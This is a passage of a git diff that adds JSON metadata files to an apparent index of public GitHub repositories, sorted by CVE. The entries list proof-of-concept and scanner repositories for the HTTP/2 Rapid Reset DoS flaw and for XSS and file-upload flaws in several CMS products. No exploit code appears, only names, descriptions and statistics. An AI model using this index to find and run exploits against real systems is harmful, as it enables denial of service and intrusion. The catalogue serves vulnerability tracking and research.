+ "html_url": "https:\/\/github.com\/febinrev\/atril_cbt-inject-exploit",
+ "description": "CVE-2023-44452, CVE-2023-51698: CBT File Parsing Argument Injection that affected Popular Linux Distros",
+ "fork": false,
+ "created_at": "2024-01-17T09:26:16Z",
+ "updated_at": "2024-03-06T04:43:54Z",
+ "pushed_at": "2024-01-17T09:36:25Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44487.json b/2023/CVE-2023-44487.json
new file mode 100644
index 0000000000..9b23998519
--- /dev/null
+++ b/2023/CVE-2023-44487.json
@@ -0,0 +1,428 @@
+[
+ {
+ "id": 703062371,
+ "name": "CVE-2023-44487",
+ "full_name": "bcdannyboy\/CVE-2023-44487",
+ "owner": {
+ "login": "bcdannyboy",
+ "id": 12553297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4",
+ "html_url": "https:\/\/github.com\/bcdannyboy"
+ },
+ "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2023-44487",
+ "description": "Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487",
+ "fork": false,
+ "created_at": "2023-10-10T14:20:42Z",
+ "updated_at": "2024-06-16T17:37:37Z",
+ "pushed_at": "2024-01-08T11:12:08Z",
+ "stargazers_count": 216,
+ "watchers_count": 216,
+ "has_discussions": false,
+ "forks_count": 48,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 48,
+ "watchers": 216,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 703303512,
+ "name": "CVE-2023-44487",
+ "full_name": "imabee101\/CVE-2023-44487",
+ "owner": {
+ "login": "imabee101",
+ "id": 29169122,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29169122?v=4",
+ "html_url": "https:\/\/github.com\/imabee101"
+ },
+ "html_url": "https:\/\/github.com\/imabee101\/CVE-2023-44487",
+ "description": "Proof of concept for DoS exploit ",
+ "fork": false,
+ "created_at": "2023-10-11T01:59:47Z",
+ "updated_at": "2024-06-19T22:55:07Z",
+ "pushed_at": "2023-10-13T11:19:10Z",
+ "stargazers_count": 49,
+ "watchers_count": 49,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2023-44487",
+ "ddos",
+ "dos",
+ "dos-attack",
+ "poc",
+ "proof-of-concept"
+ ],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 49,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 703845749,
+ "name": "CVE-2023-44487",
+ "full_name": "ByteHackr\/CVE-2023-44487",
+ "owner": {
+ "login": "ByteHackr",
+ "id": 30409831,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4",
+ "html_url": "https:\/\/github.com\/ByteHackr"
+ },
+ "html_url": "https:\/\/github.com\/ByteHackr\/CVE-2023-44487",
+ "description": "Test Script for CVE-2023-44487",
+ "fork": false,
+ "created_at": "2023-10-12T03:14:34Z",
+ "updated_at": "2023-10-12T03:30:38Z",
+ "pushed_at": "2023-10-12T03:30:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 703914770,
+ "name": "rapidreset",
+ "full_name": "pabloec20\/rapidreset",
+ "owner": {
+ "login": "pabloec20",
+ "id": 24191742,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24191742?v=4",
+ "html_url": "https:\/\/github.com\/pabloec20"
+ },
+ "html_url": "https:\/\/github.com\/pabloec20\/rapidreset",
+ "description": "CVE-2023-44487",
+ "fork": false,
+ "created_at": "2023-10-12T07:06:42Z",
+ "updated_at": "2023-12-10T09:24:05Z",
+ "pushed_at": "2023-10-12T07:11:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704732969,
+ "name": "rapidresetclient",
+ "full_name": "secengjeff\/rapidresetclient",
+ "owner": {
+ "login": "secengjeff",
+ "id": 146767590,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146767590?v=4",
+ "html_url": "https:\/\/github.com\/secengjeff"
+ },
+ "html_url": "https:\/\/github.com\/secengjeff\/rapidresetclient",
+ "description": "Tool for testing mitigations and exposure to Rapid Reset DDoS (CVE-2023-44487)",
+ "fork": false,
+ "created_at": "2023-10-13T23:55:32Z",
+ "updated_at": "2024-06-12T20:15:53Z",
+ "pushed_at": "2023-10-30T20:22:37Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 705614213,
+ "name": "CVE-2023-44487",
+ "full_name": "studiogangster\/CVE-2023-44487",
+ "owner": {
+ "login": "studiogangster",
+ "id": 12793420,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12793420?v=4",
+ "html_url": "https:\/\/github.com\/studiogangster"
+ },
+ "html_url": "https:\/\/github.com\/studiogangster\/CVE-2023-44487",
+ "description": "A python based exploit to test out rapid reset attack (CVE-2023-44487)",
+ "fork": false,
+ "created_at": "2023-10-16T11:07:50Z",
+ "updated_at": "2024-03-22T02:58:46Z",
+ "pushed_at": "2023-10-16T12:32:50Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-44487",
+ "cybersecurity",
+ "exploit",
+ "http2",
+ "rapid",
+ "rapid-reset",
+ "reset",
+ "security",
+ "zero-day"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 709722803,
+ "name": "golang-CVE-2023-44487",
+ "full_name": "ReToCode\/golang-CVE-2023-44487",
+ "owner": {
+ "login": "ReToCode",
+ "id": 16611466,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16611466?v=4",
+ "html_url": "https:\/\/github.com\/ReToCode"
+ },
+ "html_url": "https:\/\/github.com\/ReToCode\/golang-CVE-2023-44487",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T09:11:46Z",
+ "updated_at": "2023-10-26T15:03:08Z",
+ "pushed_at": "2023-10-26T15:01:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 716296930,
+ "name": "http2-rst-stream-attacker",
+ "full_name": "ndrscodes\/http2-rst-stream-attacker",
+ "owner": {
+ "login": "ndrscodes",
+ "id": 62462135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62462135?v=4",
+ "html_url": "https:\/\/github.com\/ndrscodes"
+ },
+ "html_url": "https:\/\/github.com\/ndrscodes\/http2-rst-stream-attacker",
+ "description": "Highly configurable tool to check a server's vulnerability against CVE-2023-44487 by rapidly sending HEADERS and RST_STREAM frames and documenting the server's responses.",
+ "fork": false,
+ "created_at": "2023-11-08T20:56:22Z",
+ "updated_at": "2024-05-21T12:29:02Z",
+ "pushed_at": "2024-01-11T17:44:09Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-44487",
+ "go",
+ "golang",
+ "http2",
+ "it-security",
+ "itsec",
+ "itsecurity",
+ "research",
+ "vulnerabilities",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 716960166,
+ "name": "cve-2023-44487",
+ "full_name": "nxenon\/cve-2023-44487",
+ "owner": {
+ "login": "nxenon",
+ "id": 61124903,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61124903?v=4",
+ "html_url": "https:\/\/github.com\/nxenon"
+ },
+ "html_url": "https:\/\/github.com\/nxenon\/cve-2023-44487",
+ "description": "Examples for Implementing cve-2023-44487 ( HTTP\/2 Rapid Reset Attack ) Concept",
+ "fork": false,
+ "created_at": "2023-11-10T08:38:51Z",
+ "updated_at": "2024-05-25T19:01:37Z",
+ "pushed_at": "2023-11-10T08:39:14Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-44487",
+ "ddos",
+ "dos",
+ "http2",
+ "rapid-reset",
+ "rapid-reset-attack"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 723118471,
+ "name": "HTTP-2-Rapid-Reset-Client",
+ "full_name": "terrorist\/HTTP-2-Rapid-Reset-Client",
+ "owner": {
+ "login": "terrorist",
+ "id": 108696846,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108696846?v=4",
+ "html_url": "https:\/\/github.com\/terrorist"
+ },
+ "html_url": "https:\/\/github.com\/terrorist\/HTTP-2-Rapid-Reset-Client",
+ "description": "A tool to check how well a system can handle Rapid Reset DDoS attacks (CVE-2023-44487).",
+ "fork": false,
+ "created_at": "2023-11-24T18:26:36Z",
+ "updated_at": "2024-03-19T12:16:45Z",
+ "pushed_at": "2023-11-24T20:19:44Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730433558,
+ "name": "CVE-2023-44487-",
+ "full_name": "sigridou\/CVE-2023-44487-",
+ "owner": {
+ "login": "sigridou",
+ "id": 101998818,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101998818?v=4",
+ "html_url": "https:\/\/github.com\/sigridou"
+ },
+ "html_url": "https:\/\/github.com\/sigridou\/CVE-2023-44487-",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-11T23:12:03Z",
+ "updated_at": "2023-12-11T23:13:25Z",
+ "pushed_at": "2023-12-11T23:19:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 790095472,
+ "name": "cve-2023-44487",
+ "full_name": "TYuan0816\/cve-2023-44487",
+ "owner": {
+ "login": "TYuan0816",
+ "id": 91544853,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91544853?v=4",
+ "html_url": "https:\/\/github.com\/TYuan0816"
+ },
+ "html_url": "https:\/\/github.com\/TYuan0816\/cve-2023-44487",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-22T08:56:39Z",
+ "updated_at": "2024-04-22T08:56:43Z",
+ "pushed_at": "2024-04-22T08:56:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806127239,
+ "name": "CVE-2023-44487",
+ "full_name": "sn130hk\/CVE-2023-44487",
+ "owner": {
+ "login": "sn130hk",
+ "id": 166270187,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166270187?v=4",
+ "html_url": "https:\/\/github.com\/sn130hk"
+ },
+ "html_url": "https:\/\/github.com\/sn130hk\/CVE-2023-44487",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-26T13:01:01Z",
+ "updated_at": "2024-05-26T13:01:01Z",
+ "pushed_at": "2024-05-26T13:01:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4450.json b/2023/CVE-2023-4450.json
new file mode 100644
index 0000000000..eb18281466
--- /dev/null
+++ b/2023/CVE-2023-4450.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753929545,
+ "name": "CVE-2023-4450-Attack",
+ "full_name": "ilikeoyt\/CVE-2023-4450-Attack",
+ "owner": {
+ "login": "ilikeoyt",
+ "id": 122429787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122429787?v=4",
+ "html_url": "https:\/\/github.com\/ilikeoyt"
+ },
+ "html_url": "https:\/\/github.com\/ilikeoyt\/CVE-2023-4450-Attack",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-07T03:51:34Z",
+ "updated_at": "2024-05-28T08:28:59Z",
+ "pushed_at": "2024-02-07T06:34:02Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4460.json b/2023/CVE-2023-4460.json
new file mode 100644
index 0000000000..b287fa0cc1
--- /dev/null
+++ b/2023/CVE-2023-4460.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 677181767,
+ "name": "poc-cve-xss-uploading-svg",
+ "full_name": "0xn4d\/poc-cve-xss-uploading-svg",
+ "owner": {
+ "login": "0xn4d",
+ "id": 85083396,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4",
+ "html_url": "https:\/\/github.com\/0xn4d"
+ },
+ "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-uploading-svg",
+ "description": "CVE-2023-4460",
+ "fork": false,
+ "created_at": "2023-08-11T00:11:45Z",
+ "updated_at": "2023-08-21T18:17:13Z",
+ "pushed_at": "2023-08-11T00:41:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-4460"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44758.json b/2023/CVE-2023-44758.json
new file mode 100644
index 0000000000..e2b6b8c8a1
--- /dev/null
+++ b/2023/CVE-2023-44758.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696286258,
+ "name": "CVE-2023-44758_GDidees-CMS-Stored-XSS---Title",
+ "full_name": "sromanhu\/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title",
+ "description": "GDidees CMS 3.9.2 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title",
+ "fork": false,
+ "created_at": "2023-09-25T13:07:05Z",
+ "updated_at": "2023-10-06T14:04:56Z",
+ "pushed_at": "2023-09-25T13:26:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44760.json b/2023/CVE-2023-44760.json
new file mode 100644
index 0000000000..71319c2211
--- /dev/null
+++ b/2023/CVE-2023-44760.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696301802,
+ "name": "CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes",
+ "full_name": "sromanhu\/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes",
+ "description": "Multiple Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics",
+ "fork": false,
+ "created_at": "2023-09-25T13:39:24Z",
+ "updated_at": "2023-10-06T14:05:44Z",
+ "pushed_at": "2023-09-25T13:46:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": true,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44761.json b/2023/CVE-2023-44761.json
new file mode 100644
index 0000000000..2b833bee7b
--- /dev/null
+++ b/2023/CVE-2023-44761.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696493859,
+ "name": "CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms",
+ "full_name": "sromanhu\/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms",
+ "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Form of the Data Objects.",
+ "fork": false,
+ "created_at": "2023-09-25T21:21:10Z",
+ "updated_at": "2023-10-06T14:06:13Z",
+ "pushed_at": "2023-09-25T21:39:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44762.json b/2023/CVE-2023-44762.json
new file mode 100644
index 0000000000..cb918a5e2e
--- /dev/null
+++ b/2023/CVE-2023-44762.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696500172,
+ "name": "CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags",
+ "full_name": "sromanhu\/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags",
+ "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags",
+ "fork": false,
+ "created_at": "2023-09-25T21:43:57Z",
+ "updated_at": "2023-10-06T14:06:37Z",
+ "pushed_at": "2023-09-25T21:46:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44763.json b/2023/CVE-2023-44763.json
new file mode 100644
index 0000000000..ce5ec71da5
--- /dev/null
+++ b/2023/CVE-2023-44763.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696503465,
+ "name": "CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail",
+ "full_name": "sromanhu\/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail",
+ "description": "ConcreteCMS v.9.2.1 is affected by Arbitrary File Upload vulnerability that allows Cross-Site Scriting (XSS) Stored.",
+ "fork": false,
+ "created_at": "2023-09-25T21:56:34Z",
+ "updated_at": "2023-10-06T14:07:05Z",
+ "pushed_at": "2023-09-25T22:05:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44764.json b/2023/CVE-2023-44764.json
new file mode 100644
index 0000000000..797b86b1d0
--- /dev/null
+++ b/2023/CVE-2023-44764.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696502329,
+ "name": "CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation",
+ "full_name": "sromanhu\/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation",
+ "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the SITE from installation or Settings.",
+ "fork": false,
+ "created_at": "2023-09-25T21:52:16Z",
+ "updated_at": "2023-10-06T14:07:37Z",
+ "pushed_at": "2023-09-25T21:54:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44765.json b/2023/CVE-2023-44765.json
new file mode 100644
index 0000000000..fe64201e26
--- /dev/null
+++ b/2023/CVE-2023-44765.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696490972,
+ "name": "CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations",
+ "full_name": "sromanhu\/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations",
+ "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Plural Handle of the Data Objects from System & Settings",
+ "fork": false,
+ "created_at": "2023-09-25T21:11:14Z",
+ "updated_at": "2023-10-06T14:08:14Z",
+ "pushed_at": "2023-09-25T21:19:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44766.json b/2023/CVE-2023-44766.json
new file mode 100644
index 0000000000..b68a3b8cb8
--- /dev/null
+++ b/2023/CVE-2023-44766.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696501225,
+ "name": "CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO",
+ "full_name": "sromanhu\/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO",
+ "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Header Extra Content from Page Settings. ",
+ "fork": false,
+ "created_at": "2023-09-25T21:48:07Z",
+ "updated_at": "2023-10-06T14:08:47Z",
+ "pushed_at": "2023-09-25T21:50:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44767.json b/2023/CVE-2023-44767.json
new file mode 100644
index 0000000000..f3ed2bc2bf
--- /dev/null
+++ b/2023/CVE-2023-44767.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695156657,
+ "name": "CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager",
+ "full_name": "sromanhu\/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager",
+ "description": "RiteCMS 3.0 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up",
+ "fork": false,
+ "created_at": "2023-09-22T13:31:18Z",
+ "updated_at": "2023-10-06T14:09:21Z",
+ "pushed_at": "2023-09-22T13:39:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44769.json b/2023/CVE-2023-44769.json
new file mode 100644
index 0000000000..b210b8c714
--- /dev/null
+++ b/2023/CVE-2023-44769.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697995967,
+ "name": "CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias",
+ "full_name": "sromanhu\/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias",
+ "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Spare aliases from Alias.",
+ "fork": false,
+ "created_at": "2023-09-28T23:08:12Z",
+ "updated_at": "2023-10-06T14:09:50Z",
+ "pushed_at": "2023-09-28T23:15:45Z",
+ "stargazers_count": 0,
